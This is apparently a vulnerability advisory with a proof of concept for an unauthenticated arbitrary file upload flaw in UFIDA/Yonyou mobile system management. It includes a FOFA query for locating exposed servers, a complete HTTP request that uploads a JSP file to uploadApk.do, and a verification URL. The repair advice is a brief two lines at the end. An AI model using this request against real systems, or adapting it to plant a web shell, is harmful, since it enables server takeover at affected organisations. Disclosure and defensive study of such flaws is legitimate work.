0x01 Product Introduction
UFIDA mobile system management is a mobile office solution launched by UFIDA, which aims to help enterprises realize mobile office, improve management efficiency and staff work flexibility. It provides a series of functions and tools to facilitate users to manage and process enterprise systems and businesses on mobile devices.
0x02 Vulnerability Overview
There is an arbitrary file upload vulnerability in the uploadApk.do interface of the UFIDA mobile management system. Unauthorized attackers can upload arbitrary files through the vulnerability and eventually obtain server permissions.
0x03 Recurrence environment
FOFA: app="Yonyou-Mobile System Management"
0x04 Vulnerability Reappearance
PoC
POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3
Content-Disposition: form-data; name="downloadpath"; filename="a.jsp"
Content-Type: application/msword
hello
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--
PS: The return status code must be 2, other status codes are not acceptable
verify url
http://your-ip/maupload/apk/a.jsp
0x05 Repair suggestion
Close the Internet exposed surface or set the interface access permission
Upgrade to a safe version